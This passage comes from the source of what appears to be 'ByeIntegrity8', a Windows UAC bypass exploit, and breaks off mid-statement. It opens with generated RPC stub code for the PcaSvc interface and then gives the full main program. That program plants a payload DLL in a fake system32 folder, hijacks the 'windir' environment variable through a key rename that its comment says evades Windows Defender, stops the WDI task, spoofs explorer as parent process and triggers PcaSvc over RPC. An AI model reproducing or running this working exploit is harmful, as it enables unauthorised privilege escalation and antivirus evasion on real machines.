340 | static const __midl_frag2_t __midl_frag2 = 341 | { 342 | /* RAiMonitorProcess */ 343 | { 344 | /* RAiMonitorProcess */ /* procedure RAiMonitorProcess */ 345 | (NDR64_UINT32) 17563712 /* 0x10c0040 */, /* explicit handle */ /* IsIntrepreted, ClientMustSize, HasReturn, HasExtensions */ 346 | (NDR64_UINT32) 64 /* 0x40 */ , /* Stack size */ 347 | (NDR64_UINT32) 32 /* 0x20 */, 348 | (NDR64_UINT32) 8 /* 0x8 */, 349 | (NDR64_UINT16) 0 /* 0x0 */, 350 | (NDR64_UINT16) 0 /* 0x0 */, 351 | (NDR64_UINT16) 7 /* 0x7 */, 352 | (NDR64_UINT16) 8 /* 0x8 */ 353 | }, 354 | { 355 | /* struct _NDR64_BIND_AND_NOTIFY_EXTENSION */ 356 | { 357 | /* struct _NDR64_BIND_AND_NOTIFY_EXTENSION */ 358 | 0x72, /* FC64_BIND_PRIMITIVE */ 359 | (NDR64_UINT8) 0 /* 0x0 */, 360 | 0 /* 0x0 */, /* Stack offset */ 361 | (NDR64_UINT8) 0 /* 0x0 */, 362 | (NDR64_UINT8) 0 /* 0x0 */ 363 | }, 364 | (NDR64_UINT16) 0 /* 0x0 */ /* Notify index */ 365 | }, 366 | { 367 | /* hProcess */ /* parameter hProcess */ 368 | &__midl_frag3, 369 | { 370 | /* hProcess */ 371 | 0, 372 | 0, 373 | 0, 374 | 1, 375 | 0, 376 | 0, 377 | 1, 378 | 1, 379 | 0, 380 | 0, 381 | 0, 382 | 0, 383 | 0, 384 | (NDR64_UINT16) 0 /* 0x0 */, 385 | 0 386 | }, /* [in], Basetype, ByValue */ 387 | (NDR64_UINT16) 0 /* 0x0 */, 388 | 8 /* 0x8 */, /* Stack offset */ 389 | }, 390 | { 391 | /* unknown0 */ /* parameter unknown0 */ 392 | &__midl_frag12, 393 | { 394 | /* unknown0 */ 395 | 0, 396 | 0, 397 | 0, 398 | 1, 399 | 0, 400 | 0, 401 | 1, 402 | 1, 403 | 0, 404 | 0, 405 | 0, 406 | 0, 407 | 0, 408 | (NDR64_UINT16) 0 /* 0x0 */, 409 | 0 410 | }, /* [in], Basetype, ByValue */ 411 | (NDR64_UINT16) 0 /* 0x0 */, 412 | 16 /* 0x10 */, /* Stack offset */ 413 | }, 414 | { 415 | /* exeFileName */ /* parameter exeFileName */ 416 | &__midl_frag9, 417 | { 418 | /* exeFileName */ 419 | 1, 420 | 1, 421 | 0, 422 | 1, 423 | 0, 424 | 0, 425 | 0, 426 | 0, 427 | 0, 428 | 0, 429 | 0, 430 | 0, 431 | 0, 432 | (NDR64_UINT16) 0 /* 0x0 */, 433 | 0 434 | }, /* MustSize, MustFree, [in] */ 435 | (NDR64_UINT16) 0 /* 0x0 */, 436 | 24 /* 0x18 */, /* Stack offset */ 437 | }, 438 | { 439 | /* cmdLine */ /* parameter cmdLine */ 440 | &__midl_frag9, 441 | { 442 | /* cmdLine */ 443 | 1, 444 | 1, 445 | 0, 446 | 1, 447 | 0, 448 | 0, 449 | 0, 450 | 0, 451 | 0, 452 | 0, 453 | 0, 454 | 0, 455 | 0, 456 | (NDR64_UINT16) 0 /* 0x0 */, 457 | 0 458 | }, /* MustSize, MustFree, [in] */ 459 | (NDR64_UINT16) 0 /* 0x0 */, 460 | 32 /* 0x20 */, /* Stack offset */ 461 | }, 462 | { 463 | /* workingDir */ /* parameter workingDir */ 464 | &__midl_frag9, 465 | { 466 | /* workingDir */ 467 | 1, 468 | 1, 469 | 0, 470 | 1, 471 | 0, 472 | 0, 473 | 0, 474 | 0, 475 | 0, 476 | 0, 477 | 0, 478 | 0, 479 | 0, 480 | (NDR64_UINT16) 0 /* 0x0 */, 481 | 0 482 | }, /* MustSize, MustFree, [in] */ 483 | (NDR64_UINT16) 0 /* 0x0 */, 484 | 40 /* 0x28 */, /* Stack offset */ 485 | }, 486 | { 487 | /* flags */ /* parameter flags */ 488 | &__midl_frag12, 489 | { 490 | /* flags */ 491 | 0, 492 | 0, 493 | 0, 494 | 1, 495 | 0, 496 | 0, 497 | 1, 498 | 1, 499 | 0, 500 | 0, 501 | 0, 502 | 0, 503 | 0, 504 | (NDR64_UINT16) 0 /* 0x0 */, 505 | 0 506 | }, /* [in], Basetype, ByValue */ 507 | (NDR64_UINT16) 0 /* 0x0 */, 508 | 48 /* 0x30 */, /* Stack offset */ 509 | }, 510 | { 511 | /* long */ /* parameter long */ 512 | &__midl_frag12, 513 | { 514 | /* long */ 515 | 0, 516 | 0, 517 | 0, 518 | 0, 519 | 1, 520 | 1, 521 | 1, 522 | 1, 523 | 0, 524 | 0, 525 | 0, 526 | 0, 527 | 0, 528 | (NDR64_UINT16) 0 /* 0x0 */, 529 | 0 530 | }, /* [out], IsReturn, Basetype, ByValue */ 531 | (NDR64_UINT16) 0 /* 0x0 */, 532 | 56 /* 0x38 */, /* Stack offset */ 533 | } 534 | }; 535 | 536 | static const __midl_frag1_t __midl_frag1 = 537 | (NDR64_UINT32) 0 /* 0x0 */; 538 | 539 | 540 | #include "poppack.h" 541 | 542 | 543 | static const FormatInfoRef PcaService_Ndr64ProcTable[] = 544 | { 545 | &__midl_frag2 546 | }; 547 | 548 | 549 | static const MIDL_STUB_DESC PcaService_StubDesc = 550 | { 551 | (void *)& PcaService___RpcClientInterface, 552 | MIDL_user_allocate, 553 | MIDL_user_free, 554 | &PcaService__MIDL_AutoBindHandle, 555 | 0, 556 | 0, 557 | 0, 558 | 0, 559 | pcasvc__MIDL_TypeFormatString.Format, 560 | 1, /* -error bounds_check flag */ 561 | 0x60001, /* Ndr library version */ 562 | 0, 563 | 0x801026e, /* MIDL Version 8.1.622 */ 564 | 0, 565 | 0, 566 | 0, /* notify & notify_flag routine table */ 567 | 0x2000001, /* MIDL flag */ 568 | 0, /* cs routines */ 569 | (void *)& PcaService_ProxyInfo, /* proxy/server info */ 570 | 0 571 | }; 572 | 573 | static const MIDL_SYNTAX_INFO PcaService_SyntaxInfo [ 2 ] = 574 | { 575 | { 576 | {{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}}, 577 | 0, 578 | pcasvc__MIDL_ProcFormatString.Format, 579 | PcaService_FormatStringOffsetTable, 580 | pcasvc__MIDL_TypeFormatString.Format, 581 | 0, 582 | 0, 583 | 0 584 | } 585 | ,{ 586 | {{0x71710533,0xbeba,0x4937,{0x83,0x19,0xb5,0xdb,0xef,0x9c,0xcc,0x36}},{1,0}}, 587 | 0, 588 | 0 , 589 | (unsigned short *) PcaService_Ndr64ProcTable, 590 | 0, 591 | 0, 592 | 0, 593 | 0 594 | } 595 | }; 596 | 597 | static const MIDL_STUBLESS_PROXY_INFO PcaService_ProxyInfo = 598 | { 599 | &PcaService_StubDesc, 600 | pcasvc__MIDL_ProcFormatString.Format, 601 | PcaService_FormatStringOffsetTable, 602 | (RPC_SYNTAX_IDENTIFIER*)&_RpcTransferSyntax, 603 | 2, 604 | (MIDL_SYNTAX_INFO*)PcaService_SyntaxInfo 605 | 606 | }; 607 | 608 | #if _MSC_VER >= 1200 609 | #pragma warning(pop) 610 | #endif 611 | 612 | 613 | #endif /* defined(_M_AMD64)*/ 614 | 615 | -------------------------------------------------------------------------------- /ByeIntegrity8/byeintegrity8.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include "pcasvc.h" 8 | #include "pcasvc7.h" 9 | #include "resource.h" 10 | 11 | #define g_Instance ((HINSTANCE)&__ImageBase) 12 | 13 | extern IMAGE_DOS_HEADER __ImageBase; 14 | 15 | const VARIANT VARIANT_VAL = { {{VT_NULL, 0}} }; 16 | const GUID AE_LOG = { 0x0EEF54E71, 0x661, 0x422D, {0x9A, 0x98, 0x82, 0xFD, 0x49, 0x40, 0xB8, 0x20} }; 17 | const ULONG ZERO_VALUE = 0; 18 | const EVENT_DATA_DESCRIPTOR AE_EVENT_DESCRIPTOR[3] = { 19 | {(ULONGLONG)(ULONG_PTR)&ZERO_VALUE, sizeof(ULONG)}, 20 | {(ULONGLONG)(ULONG_PTR)&ZERO_VALUE, sizeof(ULONG)}, 21 | {(ULONGLONG)(ULONG_PTR)NULL, 0} 22 | }; 23 | 24 | EVENT_DESCRIPTOR MessageBoxEvent = { 25 | 0x1F46, 26 | 0, 27 | 0x11, 28 | 0x4, 29 | 0x0, 30 | 0x0, 31 | 0x4000000000000100 32 | }; 33 | 34 | /* PcaMonitorProcess flags 35 | * Names guessed from reverse-engineering & behavioral analysis 36 | * NOCHAIN means don't use PCA chain; so don't resolve problems 37 | * */ 38 | #define PCA_MONITOR_PROCESS_NORMAL 0 39 | #define PCA_MONITOR_PROCESS_NOCHAIN 1 40 | /* Program will be monitored for installer behavior 41 | * If exe is elevated x86, it will be monitored as a 42 | * legacy installer. DM dialog will show when exe 43 | * terminates with abnormal exit code (other than 0). */ 44 | #define PCA_MONITOR_PROCESS_AS_INSTALLER 2 45 | 46 | /* PcaMonitorProcess/RAiMonitorProcess pointer prototype. Returns standard system error code. 47 | * RAiMonitorProcess returns error codes from PcaSvc & RPC_STATUS error codes. 48 | * PcaSvc needs to be running. It can be started by the INTERACTIVE users. 49 | * This function will start it for us if it's stopped, so no need to worry about that 50 | * Taken & names guessed from reverse-engineering & behavioral analysis */ 51 | 52 | /* typedef DWORD(WINAPI* PcaMonitorProcessPtr)( 53 | HANDLE hProcess, // handle to process to be monitored 54 | int unknown0, // always set to 1 55 | PWSTR exeFileName, // full path name to program executable file 56 | PWSTR cmdLine, // command line, usually exeName surrounded with quotes 57 | PWSTR workingDir, // working directory of program to be monitored, no trailing backslash 58 | ULONG flags // set of flags to modify monitoring behavior 59 | ); */ 60 | 61 | /* RAiNotifyUserCallbackExceptionProcess 62 | * RPC call used in Windows 7 to tell PCA that an unhandled exception 63 | * has occured during a user callback. PCA will launch the DM after the process 64 | * exits or after 10 seconds of being called, whichever comes first. Returns 65 | * standard system error code. 66 | * 67 | * Usually this function is called from PcaSvc itself via NdrServerCall[All][2]. */ 68 | 69 | /* long RAiNotifyUserCallbackExceptionProcess( 70 | wchar_t* exePathName, // full path name to program executable file 71 | long unknown0, // always set to 1 72 | long processId // process ID for PcaSvc to use 73 | ); */ 74 | 75 | /* Writes an event's information without registering its provider 76 | Definition taken from Geoff Chappell's website */ 77 | typedef ULONG(WINAPI* EtwEventWriteNoRegistrationPtr)( 78 | LPGUID providerId, 79 | PEVENT_DESCRIPTOR eventDescriptor, 80 | ULONG userDataCount, 81 | PEVENT_DATA_DESCRIPTOR userData 82 | ); 83 | 84 | void __RPC_FAR* __RPC_USER midl_user_allocate(size_t cBytes) 85 | { 86 | return (void __RPC_FAR*)HeapAlloc(GetProcessHeap(), 0, cBytes); 87 | } 88 | 89 | void __RPC_USER midl_user_free(void* pBuffer) 90 | { 91 | HeapFree(GetProcessHeap(), 0, pBuffer); 92 | } 93 | 94 | void AzGenRandomString( 95 | PWSTR buffer 96 | ) 97 | { 98 | LARGE_INTEGER pc; 99 | for (int i = 0; i < 8; ++i) { 100 | QueryPerformanceCounter(&pc); 101 | 102 | pc.QuadPart = RotateLeft64((ULONGLONG)(~pc.HighPart) ^ (ULONGLONG)(RotateRight64((ULONGLONG)pc.LowPart << 32, 103 | (int)(pc.LowPart & ~0xFUL))), (int)(pc.HighPart & ~pc.LowPart)); 104 | pc.HighPart = pc.HighPart & ~pc.LowPart; 105 | buffer[i] = ((ULONG)pc.HighPart % (90 - 65 + 1)) + 65; 106 | } 107 | buffer[8] = L'\0'; 108 | } 109 | 110 | HRESULT BiStopWdiTask( 111 | BOOLEAN trace 112 | ) 113 | { 114 | HRESULT hr; 115 | ITaskService* taskService; 116 | BSTR string; 117 | ITaskFolder* wdiFolder = NULL; 118 | IRegisteredTask* wdiTask = NULL; 119 | TASK_STATE taskState; 120 | 121 | hr = CoCreateInstance(&CLSID_TaskScheduler, NULL, CLSCTX_INPROC_SERVER, 122 | &IID_ITaskService, &taskService); 123 | if (!SUCCEEDED(hr)) { 124 | if (trace) 125 | wprintf(L"CoCreateInstance() failed. HRESULT: %#010x\n", hr); 126 | goto eof; 127 | } 128 | 129 | hr = taskService->lpVtbl->Connect(taskService, VARIANT_VAL, VARIANT_VAL, 130 | VARIANT_VAL, VARIANT_VAL); 131 | if (!SUCCEEDED(hr)) { 132 | if (trace) 133 | wprintf(L"ITaskService::Connect() failed. HRESULT: %#010x\n", hr); 134 | goto eof; 135 | } 136 | 137 | string = SysAllocString(L"Microsoft\\Windows\\WDI"); 138 | if (!string) { 139 | if (trace) 140 | _putws(L"SysAllocString() (0) failed. No memory"); 141 | goto eof; 142 | } 143 | hr = taskService->lpVtbl->GetFolder(taskService, string, &wdiFolder); 144 | SysFreeString(string); 145 | if (!SUCCEEDED(hr)) { 146 | if (trace) 147 | wprintf(L"ITaskService::GetFolder() failed. HRESULT: %#010x\n", hr); 148 | goto eof; 149 | } 150 | 151 | string = SysAllocString(L"\\ResolutionHost"); 152 | if (!string) { 153 | if (trace) 154 | _putws(L"SysAllocString() (1) failed. No memory"); 155 | goto eof; 156 | } 157 | hr = wdiFolder->lpVtbl->GetTask(wdiFolder, string, &wdiTask); 158 | SysFreeString(string); 159 | if (!SUCCEEDED(hr)) { 160 | if (trace) 161 | wprintf(L"ITaskFolder::GetTask() failed. HRESULT: %#010x\n", hr); 162 | goto eof; 163 | } 164 | 165 | hr = wdiTask->lpVtbl->get_State(wdiTask, &taskState); 166 | if (!SUCCEEDED(hr)) { 167 | if (trace) 168 | wprintf(L"IRegisteredTask::get_State() failed. HRESULT: %#010x\n", hr); 169 | goto eof; 170 | } 171 | if (taskState == TASK_STATE_RUNNING) { 172 | hr = wdiTask->lpVtbl->Stop(wdiTask, 0); 173 | if (!SUCCEEDED(hr)) { 174 | if (trace) 175 | wprintf(L"IRegisteredTask::Stop() failed. HRESULT: %#010x\n", hr); 176 | goto eof; 177 | } 178 | } 179 | 180 | eof: 181 | if (wdiTask) 182 | wdiTask->lpVtbl->Release(wdiTask); 183 | if (wdiFolder) 184 | wdiFolder->lpVtbl->Release(wdiFolder); 185 | if (taskService) 186 | taskService->lpVtbl->Release(taskService); 187 | return hr; 188 | } 189 | 190 | int BiTriggerMain( 191 | void 192 | ) 193 | { 194 | ULONG win32Status; 195 | EtwEventWriteNoRegistrationPtr EtwEventWriteNoRegistration; 196 | HMODULE hModule; 197 | 198 | hModule = GetModuleHandleW(L"ntdll.dll"); 199 | if (hModule) { 200 | EtwEventWriteNoRegistration = (EtwEventWriteNoRegistrationPtr)GetProcAddress(hModule, "EtwEventWriteNoRegistration"); 201 | if (!EtwEventWriteNoRegistration) 202 | return (int)GetLastError(); 203 | } 204 | else 205 | return (int)GetLastError(); 206 | 207 | // write an event that PcaSvc will catch that indicates a version message box has been detected 208 | win32Status = EtwEventWriteNoRegistration((LPGUID)&AE_LOG, &MessageBoxEvent, 209 | 3, (PEVENT_DATA_DESCRIPTOR)&AE_EVENT_DESCRIPTOR); 210 | if (win32Status != ERROR_SUCCESS) 211 | return win32Status; 212 | 213 | MessageBoxEvent.Id = 0x1F48; 214 | // write an event that PcaSvc will catch that indicates a message box with an error icon has been detected 215 | win32Status = EtwEventWriteNoRegistration((LPGUID)&AE_LOG, &MessageBoxEvent, 216 | 3, (PEVENT_DATA_DESCRIPTOR)&AE_EVENT_DESCRIPTOR); 217 | 218 | return win32Status; 219 | } 220 | 221 | RPC_STATUS BiCreatePcaRpcBinding( 222 | RPC_BINDING_HANDLE* bindingHandle 223 | ) 224 | { 225 | RPC_WSTR strBinding; 226 | RPC_BINDING_HANDLE hBinding = NULL; 227 | BYTE sid[SECURITY_MAX_SID_SIZE]; 228 | DWORD sidSize = SECURITY_MAX_SID_SIZE; 229 | RPC_SECURITY_QOS_V3_W security; 230 | RPC_STATUS rStatus; 231 | 232 | rStatus = RpcStringBindingComposeW(L"0767a036-0d22-48aa-ba69-b619480f38cb", 233 | L"ncalrpc", NULL, NULL, NULL, &strBinding); 234 | if (rStatus) { 235 | wprintf(L"RpcStringBindingComposeW() failed. Error: %ld\n", rStatus); 236 | goto eof; 237 | } 238 | rStatus = RpcBindingFromStringBindingW(strBinding, &hBinding); 239 | RpcStringFreeW(&strBinding); 240 | if (rStatus) { 241 | wprintf(L"RpcStringBindingComposeW() failed. Error: %ld\n", rStatus); 242 | goto eof; 243 | } 244 | rStatus = RpcBindingSetOption(hBinding, 12, 200); 245 | if (rStatus) { 246 | wprintf(L"RpcBindingSetOption() failed. Error: %ld\n", rStatus); 247 | goto eof; 248 | } 249 | rStatus = (RPC_STATUS)CreateWellKnownSid(WinLocalSystemSid, NULL, sid, &sidSize); 250 | if (!rStatus) { 251 | wprintf(L"CreateWellKnownSid() failed. Error: %lu\n", GetLastError()); 252 | goto eof; 253 | } 254 | 255 | ZeroMemory(&security, sizeof(RPC_SECURITY_QOS_V3_W)); 256 | security.Version = 3; 257 | security.ImpersonationType = RPC_C_IMP_LEVEL_IMPERSONATE; 258 | security.Capabilities = RPC_C_QOS_CAPABILITIES_MUTUAL_AUTH; 259 | security.Sid = sid; 260 | rStatus = RpcBindingSetAuthInfoExW(hBinding, NULL, 261 | RPC_C_AUTHN_LEVEL_PKT_PRIVACY, RPC_C_AUTHN_WINNT, 262 | 0, 0, (RPC_SECURITY_QOS*)&security); 263 | if (rStatus) { 264 | wprintf(L"RpcBindingSetAuthInfoExW() failed. Error: %ld\n", rStatus); 265 | goto eof; 266 | } 267 | 268 | *bindingHandle = hBinding; 269 | return rStatus; 270 | 271 | eof: 272 | if (hBinding) 273 | RpcBindingFree(&hBinding); 274 | return rStatus; 275 | } 276 | 277 | int wmain( 278 | int argc, 279 | PWCHAR* argv 280 | ) 281 | { 282 | if (argv[0][0] == L'0') 283 | return BiTriggerMain(); 284 | if (argv[0][0] == L'1') { 285 | Sleep(2000); 286 | return 0; 287 | } 288 | if (argv[0][0] == L'2') { 289 | HRESULT hr; 290 | HANDLE hEvent; 291 | 292 | hEvent = OpenEventW(EVENT_MODIFY_STATE, FALSE, L"ByeIntegrity8Delete"); 293 | if (!hEvent) { 294 | hr = HRESULT_FROM_WIN32(GetLastError()); 295 | goto end; 296 | } 297 | 298 | hr = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED | COINIT_DISABLE_OLE1DDE | 299 | COINIT_SPEED_OVER_MEMORY); 300 | if (!SUCCEEDED(hr)) 301 | goto end; 302 | 303 | hr = BiStopWdiTask(FALSE); 304 | SetEvent(hEvent); 305 | CoUninitialize(); 306 | 307 | end: 308 | if (hEvent) 309 | CloseHandle(hEvent); 310 | return (int)hr; 311 | } 312 | 313 | int exitCode = EXIT_FAILURE; 314 | WCHAR cmdLine[2]; 315 | PROCESS_INFORMATION processInfo = { NULL, NULL, 0 }; 316 | STARTUPINFOEXW si; 317 | HRSRC resource; 318 | HGLOBAL loadedResource; 319 | LPVOID payload; 320 | HANDLE hPayload, hSharedMem = NULL; 321 | BOOLEAN createdSystemFake = FALSE, createdPayload = FALSE, comReady = FALSE, deleteList = FALSE; 322 | DWORD writtenBytes; 323 | HRESULT hr; 324 | DWORD curDirSize; 325 | PWSTR curDir = NULL; 326 | LSTATUS status; 327 | BOOLEAN taskHijacked = FALSE, usesPca = TRUE; 328 | PUCHAR pSharedMem = NULL; 329 | WCHAR exeName[MAX_PATH]; 330 | DWORD exeNameSize; 331 | SIZE_T attrSize; 332 | HANDLE explorer = NULL; 333 | WCHAR keyName[9]; 334 | SC_HANDLE scHandle = NULL, hService = NULL; 335 | SERVICE_STATUS serviceStatus; 336 | RPC_BINDING_HANDLE pcaBinding = NULL; 337 | RPC_STATUS rpcStatus; 338 | long pcaResult; 339 | HANDLE hConsole = GetStdHandle(STD_OUTPUT_HANDLE), hHijackEvent = NULL, hDeleteEvent = NULL; 340 | 341 | SetConsoleTextAttribute(hConsole, 8); 342 | _putws(L" __________ .___ __ .__ __ ______ \n" \ 343 | L" \\______ \\___.__. ____ | | _____/ |_ ____ ___________|__|/ |_ ___.__. / __ \\ \n" \ 344 | L" | | _< | |/ __ \\| |/ \\ __\\/ __ \\ / ___\\_ __ \\ \\ __< | | > < \n" \ 345 | L" | | \\\\___ \\ ___/| | | \\ | \\ ___// /_/ > | \\/ || | \\___ | / -- \\\n" \ 346 | L" |______ // ____|\\___ >___|___| /__| \\___ >___ /|__| |__||__| / ____| \\______ /\n" \ 347 | L" \\/ \\/ \\/ \\/ \\/_____/ \\/ \\/ \n"); 348 | SetConsoleTextAttribute(hConsole, 7); 349 | 350 | if (*(PULONG)0x7FFE026C == 6 && *(PULONG)0x7FFE0270 == 1) { 351 | cmdLine[0] = L'1'; 352 | cmdLine[1] = L'\0'; 353 | usesPca = FALSE; 354 | } 355 | else { 356 | cmdLine[0] = L'0'; 357 | cmdLine[1] = L'\0'; 358 | } 359 | 360 | si.lpAttributeList = NULL; 361 | hr = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED | COINIT_DISABLE_OLE1DDE | COINIT_SPEED_OVER_MEMORY); 362 | if (!SUCCEEDED(hr)) { 363 | wprintf(L"CoInitializeEx() failed. Error: %lu\n", GetLastError()); 364 | goto eof; 365 | } 366 | 367 | resource = FindResourceW(g_Instance, MAKEINTRESOURCEW(IDR_PAYLOAD1), L"PAYLOAD"); 368 | if (!resource) { 369 | wprintf(L"FindResourceW() failed. Error: %lu\n", GetLastError()); 370 | goto eof; 371 | } 372 | loadedResource = LoadResource(g_Instance, resource); 373 | if (!loadedResource) { 374 | wprintf(L"LoadResource() failed. Error: %lu\n", GetLastError()); 375 | goto eof; 376 | } 377 | payload = LockResource(loadedResource); 378 | if (!payload) { 379 | wprintf(L"LockResource() failed. Error: %lu\n", GetLastError()); 380 | goto eof; 381 | } 382 | 383 | if (!CreateDirectoryW(L"system32", NULL)) { 384 | wprintf(L"CreateDirectoryW() failed. Error: %lu\n", GetLastError()); 385 | goto eof; 386 | } 387 | createdSystemFake = TRUE; 388 | 389 | hPayload = CreateFileW(L"system32\\pcadm.dll", FILE_WRITE_ACCESS, FILE_SHARE_READ, 390 | NULL, CREATE_NEW, FILE_ATTRIBUTE_NORMAL, NULL); 391 | if (hPayload == INVALID_HANDLE_VALUE) { 392 | wprintf(L"CreateFileW() failed. Error: %lu\n", GetLastError()); 393 | goto eof; 394 | } 395 | createdPayload = TRUE; 396 | if (!WriteFile(hPayload, payload, SizeofResource(g_Instance, resource), &writtenBytes, NULL)) { 397 | CloseHandle(hPayload); 398 | wprintf(L"WriteFile() failed. Error: %lu\n", GetLastError()); 399 | goto eof; 400 | } 401 | CloseHandle(hPayload); 402 | 403 | if (!SUCCEEDED(BiStopWdiTask(TRUE))) 404 | goto eof; 405 | 406 | scHandle = OpenSCManagerW(NULL, SERVICES_ACTIVE_DATABASEW, SC_MANAGER_CONNECT); 407 | if (!scHandle) { 408 | wprintf(L"OpenSCManagerW() failed. Error: %lu\n", GetLastError()); 409 | goto eof; 410 | } 411 | hService = OpenServiceW(scHandle, L"PcaSvc", SERVICE_START | SERVICE_QUERY_STATUS); 412 | if (!hService) { 413 | wprintf(L"OpenServiceW() failed. Error: %lu\n", GetLastError()); 414 | goto eof; 415 | } 416 | if (!QueryServiceStatus(hService, &serviceStatus)) { 417 | wprintf(L"QueryServiceStatus() failed. Error: %lu\n", GetLastError()); 418 | goto eof; 419 | } 420 | if (serviceStatus.dwCurrentState != SERVICE_RUNNING) 421 | if (!StartServiceW(hService, 0, NULL)) { 422 | wprintf(L"StartServiceW() failed. Error: %lu\n", GetLastError()); 423 | goto eof; 424 | } 425 | 426 | exeNameSize = MAX_PATH; 427 | if (!QueryFullProcessImageNameW(GetCurrentProcess(), 0, exeName, &exeNameSize)) { 428 | wprintf(L"QueryFullProcessImageNameW() failed. Error: %lu\n", GetLastError()); 429 | goto eof; 430 | } 431 | 432 | curDirSize = GetCurrentDirectoryW(0, NULL); 433 | curDir = HeapAlloc(GetProcessHeap(), 0, curDirSize * sizeof(WCHAR)); 434 | if (curDir) { 435 | if (!GetCurrentDirectoryW(curDirSize, curDir)) { 436 | wprintf(L"GetCurrentDirectoryW() failed. Error: %lu\n", GetLastError()); 437 | goto eof; 438 | } 439 | } 440 | else { 441 | wprintf(L"HeapAlloc() (0) failed. Error: %lu\n", GetLastError()); 442 | goto eof; 443 | } 444 | 445 | hSharedMem = CreateFileMappingW(INVALID_HANDLE_VALUE, NULL, PAGE_READWRITE, 446 | 0, (exeNameSize + 1) * sizeof(WCHAR), L"ByeIntegrity8"); 447 | if (!hSharedMem) { 448 | wprintf(L"CreateFileMappingW() failed. Error: %lu\n", GetLastError()); 449 | goto eof; 450 | } 451 | 452 | pSharedMem = MapViewOfFile(hSharedMem, FILE_MAP_WRITE, 0, 0, 0); 453 | if (!pSharedMem) { 454 | wprintf(L"MapViewOfFile() failed. Error: %lu\n", GetLastError()); 455 | goto eof; 456 | } 457 | memcpy(pSharedMem, exeName, ((ULONG_PTR)exeNameSize + 1) * sizeof(WCHAR)); 458 | 459 | hHijackEvent = CreateEventW(NULL, FALSE, FALSE, L"ByeIntegrity8Loaded"); 460 | if (!hHijackEvent) { 461 | wprintf(L"CreateEventW() (0) failed. Error: %lu\n", GetLastError()); 462 | goto eof; 463 | } 464 | hDeleteEvent = CreateEventW(NULL, FALSE, FALSE, L"ByeIntegrity8Delete"); 465 | if (!hDeleteEvent) { 466 | wprintf(L"CreateEventW() (1) failed. Error: %lu\n", GetLastError()); 467 | goto eof; 468 | } 469 | 470 | ZeroMemory(&si.StartupInfo, sizeof(STARTUPINFOW)); 471 | si.StartupInfo.cb = sizeof(STARTUPINFOEXW); 472 | 473 | if (usesPca) { 474 | if (!InitializeProcThreadAttributeList(NULL, 1, 0, &attrSize) && GetLastError() != ERROR_INSUFFICIENT_BUFFER) { 475 | wprintf(L"InitializeProcThreadAttributeList() (0) failed. Error: %lu\n", GetLastError()); 476 | goto eof; 477 | } 478 | si.lpAttributeList = HeapAlloc(GetProcessHeap(), 0, attrSize); 479 | if (si.lpAttributeList) { 480 | if (!InitializeProcThreadAttributeList(si.lpAttributeList, 1, 0, &attrSize)) { 481 | wprintf(L"InitializeProcThreadAttributeList() (1) failed. Error: %lu\n", GetLastError()); 482 | goto eof; 483 | } 484 | 485 | DWORD pid; 486 | 487 | GetWindowThreadProcessId(GetShellWindow(), &pid); 488 | if (pid) { 489 | explorer = OpenProcess(PROCESS_CREATE_PROCESS, FALSE, pid); 490 | if (explorer) { 491 | if (!UpdateProcThreadAttribute(si.lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &explorer, 492 | sizeof(HANDLE), NULL, NULL)) { 493 | wprintf(L"UpdateProcThreadAttribute() failed. Error: %lu\n", GetLastError()); 494 | goto eof; 495 | } 496 | deleteList = TRUE; 497 | } 498 | else { 499 | wprintf(L"OpenProcess() failed. Error: %lu\n", GetLastError()); 500 | goto eof; 501 | } 502 | } 503 | else { 504 | wprintf(L"GetWindowThreadProcessId() failed. Error: %lu\n", GetLastError()); 505 | goto eof; 506 | } 507 | } 508 | else { 509 | wprintf(L"HeapAlloc() (1) failed. Error: %lu\n", GetLastError()); 510 | goto eof; 511 | } 512 | } 513 | 514 | // Bypass Windows Defender filter driver catching custom windir creation 515 | AzGenRandomString(keyName); 516 | status = RegRenameKey(HKEY_CURRENT_USER, L"Environment", keyName); 517 | if (status) { 518 | wprintf(L"RegRenameKey() failed. LSTATUS: %lu\n", status); 519 | goto eof; 520 | } 521 | status = RegSetKeyValueW(HKEY_CURRENT_USER, keyName, L"windir", REG_SZ, curDir, 522 | curDirSize * sizeof(WCHAR)); 523 | RegRenameKey(HKEY_CURRENT_USER, keyName, L"Environment"); 524 | if (status) { 525 | wprintf(L"RegSetKeyValueW() failed. LSTATUS: %lu\n", status); 526 | goto eof; 527 | } 528 | 529 | status = (LSTATUS)CreateProcessW(exeName, cmdLine, NULL, NULL, FALSE, CREATE_SUSPENDED | EXTENDED_STARTUPINFO_PRESENT | CREATE_NO_WINDOW, 530 | NULL, NULL, (LPSTARTUPINFOW)&si, &processInfo); 531 | if (!status) { 532 | wprintf(L"CreateProcessW() failed. Error: %lu\n", GetLastError()); 533 | RegDeleteKeyValueW(HKEY_CURRENT_USER, L"Environment", L"windir"); 534 | goto eof; 535 | } 536 | 537 | rpcStatus = BiCreatePcaRpcBinding(&pcaBinding); 538 | if (rpcStatus) { 539 | wprintf(L"BiCreatePcaRpcBinding() failed. Error: %#010x\n", rpcStatus); 540 | TerminateProcess(processInfo.hProcess, 0); 541 | RegDeleteKeyValueW(HKEY_CURRENT_USER, L"Environment", L"windir"); 542 | goto eof; 543 | } 544 | 545 | if (usesPca) { 546 | __try { 547 | pcaResult = RAiMonitorProcess(pcaBinding, (unsigned long long)processInfo.hProcess, 1, 548 | exeName, cmdLine, curDir, PCA_MONITOR_PROCESS_NORMAL); 549 | } 550 | __except (EXCEPTION_EXECUTE_HANDLER) { 551 | TerminateProcess(processInfo.hProcess, 0); 552 | wprintf(L"RAiMonitorProcess() exception: %#010x\n", GetExceptionCode()); 553 | goto eofEarly; 554 | } 555 | if (pcaResult) { 556 | TerminateProcess(processInfo.hProcess, 0); 557 | wprintf(L"RAiMonitorProcess() failed. Error: %ld\n", pcaResult); 558 | goto eofEarly; 559 | } 560 | 561 | ResumeThread(processInfo.hThread); 562 | WaitForSingleObject(processInfo.hProcess, INFINITE); 563 | GetExitCodeProcess(processInfo.hProcess, &curDirSize); 564 | if (curDirSize) { 565 | wprintf(L"Trigger process exited with error code: %#010x\n", curDirSize); 566 | goto eofEarly; 567 | } 568 | } 569 | else { 570 | ResumeThread(processInfo.hThread); 571 | 572 | __try { 573 | pcaResult = 